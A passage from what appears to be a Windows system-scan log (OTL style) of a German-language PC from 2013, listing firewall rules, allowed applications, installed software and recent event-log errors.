"{C5E4B5F0-2565-47F0-BA30-E5D0A2C3F945}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D13746C7-7958-4013-AECA-98927F72D0E3}" = lport=9100 | protocol=6 | dir=in | name=druckvorgang |
"{DDE5D42A-1EEF-4E00-92D0-47D0E51AB330}" = lport=137 | protocol=17 | dir=in | app=system |
"{E2E56FB5-755A-42A9-8A73-E880A0A13AE4}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{E484B1B6-C9CC-44A0-9B1A-14E884C1F0F5}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{EA8F5F1F-F977-40E7-A979-228DB1386A04}" = lport=2869 | protocol=6 | dir=in | app=system |
"{ECB97293-6157-4B56-A4ED-DFA434334AE6}" = lport=161 | protocol=17 | dir=in | name=druckvorgang |
"{F157BA55-7A62-4FB1-A0B3-8A82A599FA56}" = lport=138 | protocol=17 | dir=in | app=system |
"{F9E44214-6BC0-4487-8EC6-AB7B30018A81}" = lport=139 | protocol=6 | dir=in | app=system |
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02B9C774-B905-41FC-A2D1-75DF4619E895}" = dir=in | app=c:\program files\windows live\messenger\msnmsgr.exe |
"{0A5D1B97-BBE1-495D-BBBF-F30D4F93162D}" = protocol=17 | dir=in | app=c:\program files\steam\steam.exe |
"{0BAF21EF-E9FC-4CF4-93B0-3ED23A7158E8}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe |
"{0C32669F-9681-40CE-A1D4-C7AB38968466}" = protocol=6 | dir=out | app=system |
"{389B7691-D2B7-4C32-981C-C0E2E19DB03E}" = dir=in | app=c:\program files\itunes\itunes.exe |
"{50E11D82-CDA2-4E47-AAD9-95823320FC4C}" = protocol=6 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{51A3D040-9C95-42E2-BE71-1B9AD02ED48B}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{52E95DAA-933C-4D68-9697-3CF80F64C39A}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{54A09723-E23A-4A6F-A840-10DC2ED4C344}" = protocol=6 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{63E29624-2FE6-42EB-99F6-33773F75B861}" = protocol=6 | dir=in | app=c:\program files\steam\steam.exe |
"{756C08B9-7CDD-4990-B794-C4ADD80BB032}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{7AF5684D-E528-4F82-926D-674F83F20695}" = dir=in | app=c:\program files\skype\phone\skype.exe |
"{7C6897E3-B4C4-450F-9764-FE373F7CFDAA}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"{7DF486C3-196E-4F8A-AC7C-222230CD76A3}" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{81656EC6-C46F-4AFD-8484-CE9DFE27EB8E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{819D59A3-99E3-4B76-9FAF-F28AE3C434DF}" = dir=in | app=c:\program files\windows live\messenger\wlcsdk.exe |
"{848E79B3-00E7-4552-BF0F-B162002B4C7C}" = protocol=17 | dir=in | app=c:\program files\steam\steamapps\common\lara croft and the guardian of light\lcgol_demo.exe |
"{84DE97A2-5504-4898-A5A1-CEF0EDDE3321}" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{906D20E7-3A39-4285-974C-590269957501}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{94EA64CE-4D98-4475-985C-235F63CC60FE}" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"{9544BF85-15F9-44AB-A29D-7AC0463E094B}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{96F774E7-DCCB-4B20-9E12-0946056C59C6}" = dir=in | app=c:\program files\cyberlink\powerdvd\powerdvd.exe |
"{9F1D8106-7399-41E8-9482-52ED00FFAED6}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{A614BE8C-9BD6-4394-991C-6DACC3AD9742}" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\devicesetup.exe |
"{A7FE49D8-6A96-4DCB-9FDA-F1F57BB7A8F0}" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkystarter.exe |
"{A9FA9560-6BC2-4BD0-814B-4C3DB20A60E9}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{B847FD48-FA6D-4C76-B86F-8F23E7404D85}" = protocol=17 | dir=in | app=c:\program files\netdrive\ndsvc.exe |
"{C2312C03-1D0F-418D-B134-733F7279A5F5}" = protocol=6 | dir=out | app=c:\windows\system32\wudfhost.exe |
"{D78B0574-F8C5-4F89-8149-1AEB518B1E5E}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{E25E6FA1-EDBB-4599-B619-D0A05BF2F11B}" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"{EAAAB938-3FB4-41E7-9EB3-93867BBC6639}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{EE7CB5C6-BD08-41F2-9C8C-0F81FD3A9763}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office12\onenote.exe |
"{F8E7FAB1-45F0-4D7B-B5F5-162903729B9C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{FE806151-3416-42AC-9A96-3634510E4ABC}" = protocol=6 | dir=out | svc=upnphost | app=c:\windows\system32\svchost.exe |
"TCP Query User{1C44A64E-7EB0-4B06-93EA-2D4268F1C6C4}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"TCP Query User{422D3EAE-E423-4344-B580-6B7A3F5818B0}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=6 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"TCP Query User{49FA6209-ED38-4394-A976-664D2601A759}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{54F32131-E99A-4B90-9163-52790E026ACF}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"TCP Query User{99B64360-59F8-4411-A29D-5EFC517B40CF}C:\mirc\mirc.exe" = protocol=6 | dir=in | app=c:\mirc\mirc.exe |
"TCP Query User{9A951EC7-7B4B-48ED-8239-26A5AFF9EF09}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=6 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"TCP Query User{9C81CDE5-82E8-4636-A73D-1A6A092697FF}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"TCP Query User{AD32AB7E-B300-488E-B15C-C2B182DAB005}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=6 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"TCP Query User{BF26C7E1-3F10-4A71-8C98-5B1C0B422B22}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=6 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"TCP Query User{CC5AEAA9-C7DE-4782-AB51-DB1C20F0E021}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=6 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"TCP Query User{D2E5FFA7-7229-473F-93F7-2CD32C4E4C8F}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=6 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"TCP Query User{F131C037-70F7-4E1B-B8B7-E614FACAC880}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=6 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
"UDP Query User{012AFCFB-BD0A-40C9-B628-5B7B63313513}C:\program files\twonky\twonkyserver\twonkyserver.exe" = protocol=17 | dir=in | app=c:\program files\twonky\twonkyserver\twonkyserver.exe |
"UDP Query User{04D70229-8EC9-4E6C-8FA7-E4930955B82F}C:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs6ca7\enterprisedu.exe |
"UDP Query User{0D93800B-6DA5-4E7F-B294-18BA28D202CF}C:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs33f7\enterprisedu.exe |
"UDP Query User{1754187E-B36D-4F86-B60B-94CBA11C63F8}C:\program files\myphoneexplorer\myphoneexplorer.exe" = protocol=17 | dir=in | app=c:\program files\myphoneexplorer\myphoneexplorer.exe |
"UDP Query User{B21A7ADF-A21C-4F06-84B4-C03ABC2BF0A7}C:\program files\philips\mediamanager\twonkyrenderer.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkyrenderer.exe |
"UDP Query User{BA919B03-07EC-4F47-895D-7FA00128CCB8}C:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe" = protocol=17 | dir=in | app=c:\program files\mobbcore bcontrol_1_0_809\bcontrolagent.exe |
"UDP Query User{C2282B50-D257-42B4-8E3F-A9427757132F}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{C7D5BAF4-10A1-4D73-8D53-74E7C831C723}C:\mirc\mirc.exe" = protocol=17 | dir=in | app=c:\mirc\mirc.exe |
"UDP Query User{DF097255-0F5C-45B0-81F7-FAEAF073FF5C}C:\program files\remotedesktopserver\remotedesktopserver.exe" = protocol=17 | dir=in | app=c:\program files\remotedesktopserver\remotedesktopserver.exe |
"UDP Query User{E4201583-CF21-48F5-9888-A1ED5E7215F8}C:\program files\philips\mediamanager\twonkymanager.exe" = protocol=17 | dir=in | app=c:\program files\philips\mediamanager\twonkymanager.exe |
"UDP Query User{FA82C556-4213-412C-9542-F1389C34D65C}C:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe" = protocol=17 | dir=in | app=c:\users\ant\appdata\local\temp\7zs4352\enterprisedu.exe |
"UDP Query User{FF74768D-8101-423A-AB2E-BE1C00960A59}C:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe" = protocol=17 | dir=in | app=c:\program files\hp\hp officejet 6500 e710n-z\bin\hpnetworkcommunicator.exe |
========== HKEY_LOCAL_MACHINE Uninstall List ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
"{03655260-E933-4DD9-939B-46E8ABCB1184}" = 11589 DVB-T x86
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{052FDD78-A6EA-3187-8386-C82F4CA3A929}" = Microsoft .NET Framework 3.5 Language Pack SP1 - deu
"{07629207-FAA0-4F1A-8092-BF5085BE511F}" = Unterstützungsdateien für das Microsoft SQL Server-Setup (Englisch)
"{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}" = Windows Live ID Sign-in Assistant
"{0E64B098-8018-4256-BA23-C316A43AD9B0}" = QuickTime
"{11083C7A-D0D6-4DA4-8C3A-74B8389EC07B}" = ATI Catalyst Registration
"{11316260-6666-467B-AC34-183FCB5D4335}" = Acer Mobility Center Plug-In
"{116FF17B-1A30-4FC2-9B01-5BC5BD46B0B3}" = Acer eLock Management
"{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"{1EBD33A9-2AAF-4CE6-8D62-9D3634C8B43B}" = HP Officejet 6500 E710n-z - Grundlegende Software für das Gerät
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live-Uploadtool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216013FF}" = Java(TM) 6 Update 21
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros for Acer Driver v7.2.0.208_Foxconn Installation Program
"{2EEC2A94-7204-45C6-93BB-67EAEB19E4D6}" = Safari
"{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}" = HP Update
"{3921A67A-5AB1-4E48-9444-C71814CF3027}" = VCRedistSetup
"{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
"{41E654A9-26D0-4EAC-854B-0FA824FFFABB}" = Windows Live Messenger
"{459699C3-9430-4381-964B-4248D87B49F9}" = Apple Mobile Device Support
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4EF8BE6A-899C-4196-94E7-297C5F7A203E}" = pdfforge Toolbar v1.1.1
"{50120000-1105-0000-0000-0000000FF1CE}" = Microsoft Office 2007 Primary Interop Assemblies
"{56C049BE-79E9-4502-BEA7-9754A3E60F9B}" = neroxml
"{58E5844B-7CE2-413D-83D1-99294BF6C74F}" = Acer ePower Management
"{5968F27A-66E6-171E-5311-0A74D74AAD9B}" = ATI Catalyst Install Manager
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{5FC68772-6D56-41C6-9DF1-24E868198AE6}" = Windows Live Call
"{5FCCD531-1B38-4A94-924C-127F722F1031}" = Nero 8
"{5FD89EA1-99C2-40EE-BBF5-20F8991ED756}" = Catalyst Control Center - Branding
"{65DA2EC9-0642-47E9-AAE2-B5267AA14D75}" = Activation Assistant for the 2007 Microsoft Office suites
"{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
"{6AFCA4E1-9B78-3640-8F72-A7BF33448200}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}" = Bing Bar
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79155F2B-9895-49D7-8612-D92580E0DE5B}" = Bonjour
"{7AB86D35-DF3B-407F-B43E-468345DABF29}" = SL-6555-SBK
"{7CC673E7-5271-409D-B196-BB76DA60300B}" = Twonky Windows Components
"{7ED4E9AB-9B5D-5380-9AB7-2865CA1DA0DB}" = AMD Fuel
"{7FB12670-0F93-4E1E-B2F5-4F339199A03A}" = Microsoft SQL Server Native Client
"{849A32C3-E75A-4791-9B11-E568BA3525A4}" = Microsoft SQL Server VSS Writer
"{85092B90-AEB2-2E30-0EF1-432EC61F6BD1}" = Catalyst Control Center InstallProxy
"{86B247F9-1D5E-CCC6-3280-71486D9A4E70}" = ATI Stream SDK v2 Developer
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{88410D8F-8529-492B-B556-2394A29B811B}" = Broadcom Driver v4.102.15.63_Foxconn Installation Program
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8ACC73AA-6511-7C55-B1A9-8E5D1DEAFAA3}" = The Lord of the Rings FREE Trial
"{90120000-0016-0407-0000-0000000FF1CE}" = Microsoft Office Excel MUI (German) 2007
"{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0407-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (German) 2007
"{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0407-0000-0000000FF1CE}" = Microsoft Office Word MUI (German) 2007
"{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2007
"{90120000-001F-0407-0000-0000000FF1CE}_HOMESTUDENTR_{928D7B99-2BEA-49F9-83B8-20FA57860643}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_HOMESTUDENTR_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_HOMESTUDENTR_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2007
"{90120000-001F-0410-0000-0000000FF1CE}_HOMESTUDENTR_{A23BFC95-4A73-410F-9248-4C2B48E38C49}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2007
"{90120000-006E-0407-0000-0000000FF1CE}_HOMESTUDENTR_{A6353E8F-5B8D-47CC-8737-DFF032ED3973}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0407-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (German) 2007
"{90120000-00A1-0407-0000-0000000FF1CE}_HOMESTUDENTR_{DB2ACBD1-65B1-4FC5-881E-4E75C668E7E2}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-0019-0407-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (German) 2010
"{90140000-0019-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{69E54534-4569-4639-89E9-305B60A11601}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0407-0000-0000000FF1CE}" = Microsoft Office Proof (German) 2010
"{90140000-001F-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{65A2328E-FDFB-4CA3-8582-357EA6825FEA}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}_Office14.PUBLISHERR_{99ACCA38-6DD3-48A8-96AE-A283C9759279}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-040C-0000-0000000FF1CE}_Office14.PUBLISHERR_{46298F6A-1E7E-4D4A-B5F5-106A4F0E48C6}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-001F-0410-0000-0000000FF1CE}" = Microsoft Office Proof (Italian) 2010
"{90140000-001F-0410-0000-0000000FF1CE}_Office14.PUBLISHERR_{C0743197-FFEE-4C19-BAEB-8F7437DC4C8A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-002C-0407-0000-0000000FF1CE}" = Microsoft Office Proofing (German) 2010
"{90140000-002C-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{4275FB46-ABDF-4456-876C-17CF64294D9A}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-006E-0407-0000-0000000FF1CE}" = Microsoft Office Shared MUI (German) 2010
"{90140000-006E-0407-0000-0000000FF1CE}_Office14.PUBLISHERR_{98EDFD9F-EA76-40CC-BCE9-92C69413F65B}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{90A40407-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components
"{91120000-002F-0000-0000-0000000FF1CE}" = Microsoft Office Home and Student 2007
"{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{91140000-0019-0000-0000-0000000FF1CE}" = Microsoft Office Publisher 2010
"{91140000-0019-0000-0000-0000000FF1CE}_Office14.PUBLISHERR_{047B0968-E622-4FAA-9B4B-121FA109EDDE}" = Microsoft Office 2010 Service Pack 1 (SP1)
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{99E862CC-6F69-4D39-99AA-DBF71BF3B585}" = OpenOffice.org 3.1
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A5633652-3795-4829-BB0B-644F0279E279}" = Acer eDataSecurity Management
"{A77255C4-AFCB-44A3-BF0F-2091A71FFD9E}" = Acer Crystal Eye Webcam 2.0.9.2
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A939D341-5A04-4E0A-BB55-3E65B386432D}" = Microsoft Office Small Business Connectivity Components
"{AB6097D9-D722-4987-BD9E-A076E2848EE2}" = Acer Empowering Technology
"{AC4C38FD-A54C-4CA5-92EE-D983CD81293E}" = Microsoft Xbox 360 Accessories 1.2
"{AC76BA86-7AD7-1031-7B44-A95000000001}" = Adobe Reader 9.5.5 - Deutsch
"{AC76BA86-7AD7-5464-3428-900000000004}" = Spelling Dictionaries Support For Adobe Reader 9
"{AEBBFC67-7A03-4DF3-9E71-BA5C9EB4FBEF}" = MobileMe Control Panel
"{B0261E53-B6F1-474A-864B-E7C3CBF468E0}" = iTunes
"{B3276CB1-20B6-4AF9-AAEC-E72C83816495}" = IKEA Home Planner
"{C06554A1-2C1E-4D20-B613-EE62C79927CC}" = Acer eNet Management
"{C7EA1AF1-F908-0832-AA52-5EDBE128FD6B}" = ccc-core-static
"{CA6BCA2F-EDEB-408F-850B-31404BE16A61}" = I.R.I.S. OCR
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE386A4E-D0DA-4208-8235-BCE43275C694}" = LightScribe 1.4.142.1
"{CE65A9A0-9686-45C6-9098-3C9543A412F0}" = Acer eSettings Management
"{D642E38E-0D24-486C-9A2D-E316DD696F4B}" = Microsoft XML Parser
"{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}" = NVIDIA PhysX
"{E1640DA5-89B4-4F52-B15D-5DA3D14F29D4}" = LG USB Modem Drivers
"{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"{E9D4FBA9-FB46-A5CE-F52F-516C4B8F0373}" = ccc-utility
"{EB0E062C-575D-8154-2682-C84EF432CCF0}" = Catalyst Control Center Graphics Previews Common
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{EE7257A2-39A2-4D2F-9DAC-F9F25B8AE1D8}" = Skype™ 5.10
"{EEA54973-AFC8-21C8-1414-246AA9435890}" = CCC Help English
"{EFBC0CB1-AFFD-4E74-ACEF-42099F1D49C3}" = HP Officejet 6500 E710n-z Hilfe
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F1FCC8AD-0F88-4D77-8530-0FBB088485F1}" = WEB.DE Update
"{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}" = Microsoft Office Live Add-in 1.5
"{F8FF18EE-264A-43FD-B2F6-5EAD40798C2F}" = Windows Live Essentials
"{FB0C267C-8B4F-4867-8161-A6A3B66D42C1}" = Marketsplash Schnellzugriffe
"{FB91E774-867B-4567-ACE7-8144EF036068}" = Olympus Digital Wave Player
"Activation Assistant for the 2007 Microsoft Office suites" = Activation Assistant for the 2007 Microsoft Office suites
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"AVerMedia A835 USB TV Tuner" = AVerMedia A835 USB TV Tuner 8.0.0.43
"Avira AntiVir Desktop" = Avira Free Antivirus
"AVMFBox" = AVM FRITZ!Box Dokumentation
"AVMFBoxPrinter" = AVM FRITZ!Box Druckeranschluss
"CCleaner" = CCleaner
"CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2BFAOR2C06_118" = HDAUDIO Soft Data Fax Modem with SmartCP
"CornelsenSTVP72" = Cornelsen Stoffverteilungsplaner 7.2
"Deutschbuch Arbeitsblattgenerator" = Deutschbuch Arbeitsblattgenerator
"DivX Setup.divx.com" = DivX-Setup
"Druckschriften Nord_is1" = Pelikan Schulschriften
"Free YouTube to MP3 Converter_is1" = Free YouTube to MP3 Converter version 3.2
"Google Chrome" = Google Chrome
"GridVista" = Acer GridVista
"HOMESTUDENTR" = Microsoft Office Home and Student 2007
"InstallShield_{1577A05B-EE62-4BBC-9DB7-FE748FA44EC2}" = NTI CD & DVD-Maker
"InstallShield_{1598034D-7147-432C-8CA8-888E0632D124}" = NTI Backup NOW! 4.7
"InstallShield_{6F7EA6CA-79F4-44A0-A370-8E82BB16534A}" = NTI Shadow
"InstallShield_{E28B1E6F-E0AA-4228-AB89-DB4A0C89D426}" = AVerTV
"KLiteCodecPack_is1" = K-Lite Codec Pack 8.0.0 (Full)
"LManager" = Launch Manager
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware Version 1.51.2.1300
"MediaManager" = MediaManager
"Microsoft .NET Framework 3.5 Language Pack SP1 - deu" = Microsoft .NET Framework 3.5 Language Pack SP1 - DEU
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Mozilla Thunderbird (2.0.0.24)" = Mozilla Thunderbird (2.0.0.24)
"MPE" = MyPhoneExplorer
"NetDrive" = NetDrive
"Office14.PUBLISHERR" = Microsoft Publisher 2010
"ownCloud" = ownCloud
"Picasa 3" = Picasa 3
"PriceGong" = PriceGong 2.6.11
"RemoteDesktopServer" = RemoteDesktopServer
"Rossmann Fotowelt Software" = Rossmann Fotowelt Software 4.9
"SCHLECKER Foto Digital Service" = SCHLECKER Foto Digital Service
"Schroedel Arbeitsblätter" = Schroedel Arbeitsblätter
"Schulausgangsschrift SAS_is1" = Pelikan Schulschriften
"Steam App 35150" = Lara Croft and the Guardian of Light Demo
"Steam App 48010" = LIMBO Demo
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"Trine 2_is1" = Trine 2
"Uninstall_is1" = Uninstall 1.0.0.1
"VLC media player" = VLC media player 0.9.9
"WEB.DE Update" = WEB.DE Update
"WinLiveSuite_Wave3" = Windows Live Essentials
"WinRAR archiver" = WinRAR
========== HKEY_CURRENT_USER Uninstall List ==========
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"17d33ce3121ed6e5" = Das Mathe Programm
"Game Organizer" = GameXN GO
"JNLP" = JNLP
"Lumines - Puzzle Fusion" = Lumines - Puzzle Fusion
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 5817527
Error - 28.05.2013 01:59:52 | Computer Name = ant-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 5817527
Error - 28.05.2013 02:04:07 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 28.05.2013 08:04:24 | Computer Name = ant-PC | Source = EventSystem | ID = 4621
Description =
Error - 28.05.2013 13:26:55 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 30.05.2013 15:05:48 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:16:52 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
Error - 02.06.2013 08:58:42 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
